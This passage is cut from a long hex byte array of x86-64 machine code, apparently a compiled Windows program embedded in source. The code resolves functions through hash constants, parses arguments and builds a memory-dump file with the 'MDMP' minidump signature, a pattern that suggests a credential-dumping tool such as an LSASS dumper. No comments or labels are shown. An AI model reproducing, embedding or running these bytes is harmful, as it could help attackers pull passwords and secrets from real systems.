45,0x10,0x48,0x89,0xC1,0xE8,0xEC,0xF1,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x72,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB9,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x20,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4C,0x86,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x37,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0x86,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x13,0x86,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x57,0x48,0x81,0xEC,0x48,0x04,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x60,0x03,0x00,0x00,0x0F,0x11,0x85,0x70,0x03,0x00,0x00,0x66,0x0F,0xD6,0x85,0x80,0x03,0x00,0x00,0xC7,0x85,0xBC,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x58,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xB8,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xB4,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xA0,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xC7,0x85,0xB0,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x98,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x40,0x02,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x89,0xFA,0x89,0x02,0x48,0x83,0xC2,0x04,0x48,0x8D,0x55,0x30,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xA8,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x30,0x48,0x89,0x45,0x28,0x66,0xC7,0x45,0x20,0x00,0x00,0x66,0xC7,0x45,0x22,0x00,0x00,0x48,0xC7,0x85,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xE8,0x07,0x72,0xFF,0xFF,0x89,0x85,0xA0,0x03,0x00,0x00,0x83,0xBD,0xA0,0x03,0x00,0x00,0x00,0x0F,0x84,0x5F,0x06,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x65,0x45,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB2,0x92,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x07,0xDE,0x4D,0xFF,0x48,0x89,0xC1,0xE8,0xC0,0x90,0xFF,0xFF,0x48,0x89,0x85,0x90,0x03,0x00,0x00,0x48,0x83,0xBD,0x90,0x03,0x00,0x00,0x00,0x0F,0x84,0x26,0x06,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x41,0x45,0x00,0x00,0x48,0x89,0xC1,0xE8,0x76,0x92,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x9C,0xA1,0x07,0x65,0x48,0x89,0xC1,0xE8,0x84,0x90,0xFF,0xFF,0x48,0x89,0x85,0x88,0x03,0x00,0x00,0x48,0x83,0xBD,0x88,0x03,0x00,0x00,0x00,0x0F,0x84,0xED,0x05,0x00,0x00,0xC7,0x45,0x1C,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x88,0x03,0x00,0x00,0xFF,0xD0,0x48,0x89,0xC1,0x48,0x8D,0x45,0x1C,0x4C,0x8B,0x85,0x90,0x03,0x00,0x00,0x48,0x89,0xC2,0x41,0xFF,0xD0,0x48,0x89,0x85,0xA8,0x03,0x00,0x00,0x48,0x83,0xBD,0xA8,0x03,0x00,0x00,0x00,0x0F,0x84,0xB7,0x05,0x00,0x00,0x8B,0x45,0x1C,0x85,0xC0,0x0F,0x84,0xAC,0x05,0x00,0x00,0xC7,0x85,0xA4,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xE9,0x02,0x03,0x00,0x00,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0xB4,0x44,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x08,0xBB,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x74,0x34,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x86,0x44,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD4,0xBA,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0F,0xC7,0x85,0xB0,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xE9,0x84,0x02,0x00,0x00,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x53,0x44,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x91,0xBA,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x74,0x38,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x25,0x44,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5D,0xBA,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x84,0x00,0x00,0x00,0x8B,0x85,0xA4,0x03,0x00,0x00,0x8D,0x50,0x01,0x8B,0x45,0x1C,0x39,0xC2,0x7C,0x23,0x48,0x8D,0x05,0x0A,0x44,0x00,0x00,0x48,0x89,0xC1,0xE8,0x24,0x6E,0xFF,0xFF,0x48,0x8D,0x05,0x11,0x44,0x00,0x00,0x48,0x89,0xC1,0xE8,0x15,0x6E,0xFF,0xFF,0xE9,0xA0,0x04,0x00,0x00,0x83,0x85,0xA4,0x03,0x00,0x00,0x01,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x10,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB7,0x17,0x00,0x00,0x48,0x8D,0x95,0x40,0x02,0x00,0x00,0x48,0x8D,0x45,0x20,0x48,0x89,0xC1,0xE8,0xAF,0x79,0xFF,0xFF,0xE9,0x94,0x01,0x00,0x00,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x91,0x43,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA1,0xB9,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x74,0x34,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x63,0x43,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x6D,0xB9,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x75,0x8B,0x85,0xA4,0x03,0x00,0x00,0x8D,0x50,0x01,0x8B,0x45,0x1C,0x39,0xC2,0x7C,0x23,0x48,0x8D,0x05,0x48,0x43,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0x6D,0xFF,0xFF,0x48,0x8D,0x05,0x25,0x43,0x00,0x00,0x48,0x89,0xC1,0xE8,0x29,0x6D,0xFF,0xFF,0xE9,0xB4,0x03,0x00,0x00,0x83,0x85,0xA4,0x03,0x00,0x00,0x01,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x41,0xB8,0x0A,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD5,0x16,0x00,0x00,0x89,0x85,0xB8,0x03,0x00,0x00,0xE9,0xB7,0x00,0x00,0x00,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0xDA,0x42,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC4,0xB8,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x74,0x34,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0xAC,0x42,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x90,0xB8,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0C,0xC7,0x85,0xB4,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x43,0x8B,0x85,0xA4,0x03,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x81,0x42,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3F,0x6C,0xFF,0xFF,0x48,0x8D,0x05,0x2C,0x42,0x00,0x00,0x48,0x89,0xC1,0xE8,0x30,0x6C,0xFF,0xFF,0xE9,0xBB,0x02,0x00,0x00,0x83,0x85,0xA4,0x03,0x00,0x00,0x01,0x8B,0x45,0x1C,0x39,0x85,0xA4,0x03,0x00,0x00,0x0F,0x8C,0xEF,0xFC,0xFF,0xFF,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9C,0xB7,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xA8,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x0F,0xB7,0x45,0x20,0x66,0x85,0xC0,0x0F,0x84,0x64,0x02,0x00,0x00,0xE8,0x37,0xDE,0xFF,0xFF,0x89,0x85,0xA0,0x03,0x00,0x00,0x83,0xBD,0xA0,0x03,0x00,0x00,0x00,0x0F,0x84,0x4F,0x02,0x00,0x00,0x83,0xBD,0xB8,0x03,0x00,0x00,0x00,0x75,0x18,0xE8,0x06,0x89,0xFF,0xFF,0x89,0x85,0xB8,0x03,0x00,0x00,0x83,0xBD,0xB8,0x03,0x00,0x00,0x00,0x0F,0x84,0x31,0x02,0x00,0x00,0x0F,0xB7,0x45,0x20,0x66,0x85,0xC0,0x75,0x23,0x48,0x8D,0x05,0xF1,0x41,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0x6B,0xFF,0xFF,0x48,0x8D,0x05,0x86,0x41,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x6B,0xFF,0xFF,0xE9,0x15,0x02,0x00,0x00,0x48,0x8D,0x45,0x20,0x48,0x89,0xC1,0xE8,0x9D,0x7A,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xF4,0x01,0x00,0x00,0x44,0x8B,0x85,0xB4,0x03,0x00,0x00,0x8B,0x95,0xB8,0x03,0x00,0x00,0x48,0x8D,0x85,0x58,0x03,0x00,0x00,0xC7,0x84,0x24,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x84,0x24,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x78,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x70,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x68,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x60,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,0x40,0x02,0x00,0x00,0x48,0x89,0x4C,0x24,0x58,0x8B,0x8D,0xB0,0x03,0x00,0x00,0x89,0x4C,0x24,0x50,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0x99,0xFF,0xFF,0x89,0x85,0xA0,0x03,0x00,0x00,0x83,0xBD,0xA0,0x03,0x00,0x00,0x00,0x0F,0x84,0x43,0x01,0x00,0x00,0x83,0xBD,0xB0,0x03,0x00,0x00,0x00,0x74,0x1E,0xC7,0x85,0x80,0x03,0x00,0x00,0x4D,0x44,0x4D,0x50,0x66,0xC7,0x85,0x84,0x03,0x00,0x00,0x93,0xA7,0x66,0xC7,0x85,0x86,0x03,0x00,0x00,0x00,0x00,0xEB,0x2C,0x48,0x8D,0x85,0x60,0x03,0x00,0x00,0x48,0x8D,0x48,0x26,0x48,0x8D,0x85,0x60,0x03,0x00,0x00,0x48,0x8D,0x50,0x24,0x48,0x8D,0x85,0x60,0x03,0x00,0x00,0x48,0x83,0xC0,0x20,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x09,0x81,0xFF,0xFF,0x48,0xC7,0x85,0x50,0x03,0x00,0x00,0x00,0x00,0x80,0x0C,0x48,0x8D,0x85,0x50,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x17,0x80,0xFF,0xFF,0x48,0x89,0x85,0x98,0x03,0x00,0x00,0x48,0x83,0xBD,0x98,0x03,0x00,0x00,0x00,0x0F,0x84,0xC4,0x00,0x00,0x00,0x48,0x8B,0x85,0x58,0x03,0x00,0x00,0x48,0x89,0x85,0x60,0x03,0x00,0x00,0x48,0x8B,0x85,0x98,0x03,0x00,0x00,0x48,0x89,0x85,0x68,0x03,0x00,0x00,0xC7,0x85,0x70,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x50,0x03,0x00,0x00,0x48,0x89,0x85,0x78,0x03,0x00,0x00,0x48,0x8D,0x85,0x60,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x01,0xF8,0xFF,0xFF,0x89,0x85,0xA0,0x03,0x00,0x00,0x83,0xBD,0xA0,0x03,0x00,0x00,0x00,0x74,0x75,0x83,0xBD,0xB0,0x03,0x00,0x00,0x00,0x75,0x17,0x8B,0x85,0x70,0x03,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0x68,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEE,0x7F,0xFF,0xFF,0x8B,0x8D,0x70,0x03,0x00,0x00,0x48,0x8B,0x95,0x68,0x03,0x00,0x00,0x48,0x8D,0x45,0x20,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xDC,0x76,0xFF,0xFF,0x89,0x85,0xA0,0x03,0x00,0x00,0x83,0xBD,0xA0,0x03,0x00,0x00,0x00,0x74,0x2D,0xC7,0x85,0xBC,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0xBD,0xA8,0x03,0x00,0x00,0x00,0x74,0x13,0x48,0x8B,0x85,0xA8,0x03,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xED,0xB4,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x85,0x68,0x03,0x00,0x00,0x48,0x85,0xC0,0x74,0x22,0x48,0x8B,0x85,0x78,0x03,0x00,0x00,0x48,0x85,0xC0,0x74,0x16,0x48,0x8B,0x95,0x78,0x03,0x00,0x00,0x48,0x8B,0x85,0x68,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x59,0x7F,0xFF,0xFF,0x48,0x8B,0x85,0x58,0x03,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x58,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x20,0xC9,0xFF,0xFF,0x83,0xBD,0xBC,0x03,0x00,0x00,0x00,0x75,0x0F,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0x79,0xFF,0xFF,0x8B,0x85,0xBC,0x03,0x00,0x00,0x48,0x81,0xC4,0x48,0x04,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x83,0x7D,0x18,0x03,0x74,0x25,0x83,0x7D,0x18,0x03,0x77,0x26,0x83,0x7D,0x18,0x02,0x74,0x1C,0x83,0x7D,0x18,0x02,0x77,0x1A,0x83,0x7D,0x18,0x00,0x74,0x13,0x83,0x7D,0x18,0x01,0x75,0x0E,0xE8,0xA6,0xF7,0xFF,0xFF,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x90,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x8B,0x05,0x81,0x21,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x26,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x05,0x67,0x21,0x00,0x00,0x48,0x8D,0x50,0x08,0x48,0x8B,0x40,0x08,0x48,0x89,0x15,0x58,0x21,0x00,0x00,0x48,0x85,0xC0,0x75,0xE3,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x15,0x7D,0x40,0x00,0x00,0x48,0x8B,0x02,0x89,0xC1,0x83,0xF8,0xFF,0x74,0x43,0x85,0xC9,0x74,0x22,0x89,0xC8,0x83,0xE9,0x01,0x48,0x8D,0x1C,0xC2,0x48,0x29,0xC8,0x48,0x8D,0x74,0xC2,0xF8,0x66,0x0F,0x1F,0x44,0x00,0x00,0xFF,0x13,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x75,0xF5,0x48,0x8D,0x0D,0x66,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xE9,0x3A,0x34,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8D,0x40,0x01,0x89,0xC1,0x4A,0x83,0x3C,0xC2,0x00,0x4C,0x89,0xC0,0x75,0xF0,0xEB,0xA3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x05,0x4A,0x93,0x00,0x00,0x85,0xC0,0x74,0x06,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0x36,0x93,0x00,0x00,0x01,0x00,0x00,0x00,0xE9,0x61,0xFF,0xFF,0xFF,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x83,0xFA,0x03,0x74,0x13,0x85,0xD2,0x74,0x0F,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0xE8,0x8B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x05,0x9D,0x3F,0x00,0x00,0x83,0x38,0x02,0x74,0x06,0xC7,0x00,0x02,0x00,0x00,0x00,0x83,0xFA,0x02,0x74,0x15,0x83,0xFA,0x01,0x74,0x48,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8D,0x1D,0x71,0xC0,0x00,0x00,0x48,0x8D,0x35,0x6A,0xC0,0x00,0x00,0x48,0x39,0xF3,0x74,0xDD,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0x02,0xFF,0xD0,0x48,0x83,0xC3,0x08,0x48,0x39,0xF3,0x75,0xED,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0xE8,0x0B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x31,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x30,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0xCB,0x48,0x8D,0x45,0x28,0xB9,0x02,0x00,0x00,0x00,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0x48,0x89,0x45,0xF8,0xE8,0xA3,0x0D,0x00,0x00,0x41,0xB8,0x1B,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x0D,0x41,0x3D,0x00,0x00,0x49,0x89,0xC1,0xE8,0x81,0x0F,0x00,0x00,0x48,0x8B,0x75,0xF8,0xB9,0x02,0x00,0x00,0x00,0xE8,0x7B,0x0D,0x00,0x00,0x48,0x89,0xDA,0x48,0x89,0xC1,0x49,0x89,0xF0,0xE8,0xCD,0x0F,0x00,0x00,0xE8,0x48,0x0F,0x00,0x00,0x90,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x63,0x35,0x20,0x92,0x00,0x00,0x48,0x89,0xCB,0x85,0xF6,0x0F,0x8E,0x11,0x01,0x00,0x00,0x48,0x8B,0x05,0x12,0x92,0x00,0x00,0x45,0x31,0xC9,0x48,0x83,0xC0,0x18,0x0F,0x1F,0x00,0x4C,0x8B,0x00,0x4C,0x39,0xC3,0x72,0x13,0x48,0x8B,0x50,0x08,0x8B,0x52,0x08,0x49,0x01,0xD0,0x4C,0x39,0xC3,0x0F,0x82,0x88,0x00,0x00,0x00,0x41,0x83,0xC1,0x01,0x48,0x83,0xC0,0x28,0x41,0x39,0xF1,0x75,0xD8,0x48,0x89,0xD9,0xE8,0x40,0x08,0x00,0x00,0x48,0x89,0xC7,0x48,0x85,0xC0,0x0F,0x84,0xE6,0x00,0x00,0x00,0x48,0x8B,0x05,0xC5,0x91,0x00,0x00,0x48,0x8D,0x1C,0xB6,0x48,0xC1,0xE3,0x03,0x48,0x01,0xD8,0x48,0x89,0x78,0x20,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x53,0x09,0x00,0x00,0x8B,0x57,0x0C,0x41,0xB8,0x30,0x00,0x00,0x00,0x48,0x8D,0x0C,0x10,0x48,0x8B,0x05,0x97,0x91,0x00,0x00,0x48,0x8D,0x55,0xD0,0x48,0x89,0x4C,0x18,0x18,0xFF,0x15,0x18,0xB1,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x7E,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x50,0xFC,0x83,0xE2,0xFB,0x74,0x08,0x8D,0x50,0xC0,0x83,0xE2,0xBF,0x75,0x14,0x83,0x05,0x61,0x91,0x00,0x00,0x01,0x48,0x83,0xC4,0x58,0x5B,0x5E,0x5F,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0x83,0xF8,0x02,0x48,0x8B,0x4D,0xD0,0x48,0x8B,0x55,0xE8,0x41,0xB8,0x40,0x00,0x00,0x00,0xB8,0x04,0x00,0x00,0x00,0x44,0x0F,0x44,0xC0,0x48,0x03,0x1D,0x37,0x91,0x00,0x00,0x48,0x89,0x4B,0x08,0x49,0x89,0xD9,0x48,0x89,0x53,0x10,0xFF,0x15,0xAE,0xB0,0x00,0x00,0x85,0xC0,0x75,0xB6,0xFF,0x15,0x3C,0xB0,0x00,0x00,0x48,0x8D,0x0D,0x65,0x3C,0x00,0x00,0x89,0xC2,0xE8,0x66,0xFE,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xF6,0xE9,0x21,0xFF,0xFF,0xFF,0x48,0x8B,0x05,0xFA,0x90,0x00,0x00,0x8B,0x57,0x08,0x48,0x8D,0x0D,0x08,0x3C,0x00,0x00,0x4C,0x8B,0x44,0x18,0x18,0xE8,0x3E,0xFE,0xFF,0xFF,0x48,0x89,0xDA,0x48,0x8D,0x0D,0xD4,0x3B,0x00,0x00,0xE8,0x2F,0xFE,0xFF,0xFF,0x90,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x55,0x41,0x57,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x44,0x8B,0x25,0xA4,0x90,0x00,0x00,0x45,0x85,0xE4,0x74,0x17,0x48,0x8D,0x65,0x08,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x41,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0x7E,0x90,0x00,0x00,0x01,0x00,0x00,0x00,0xE8,0x69,0x07,0x00,0x00,0x48,0x98,0x48,0x8D,0x04,0x80,0x48,0x8D,0x04,0xC5,0x0F,0x00,0x00,0x00,0x48,0x83,0xE0,0xF0,0xE8,0xB2,0x09,0x00,0x00,0x4C,0x8B,0x2D,0xEB,0x3C,0x00,0x00,0x48,0x8B,0x1D,0xF4,0x3C,0x00,0x00,0xC7,0x05,0x4E,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x29,0xC4,0x48,0x8D,0x44,0x24,0x30,0x48,0x89,0x05,0x43,0x90,0x00,0x00,0x4C,0x89,0xE8,0x48,0x29,0xD8,0x48,0x83,0xF8,0x07,0x7E,0x90,0x8B,0x13,0x48,0x83,0xF8,0x0B,0x0F,0x8F,0x03,0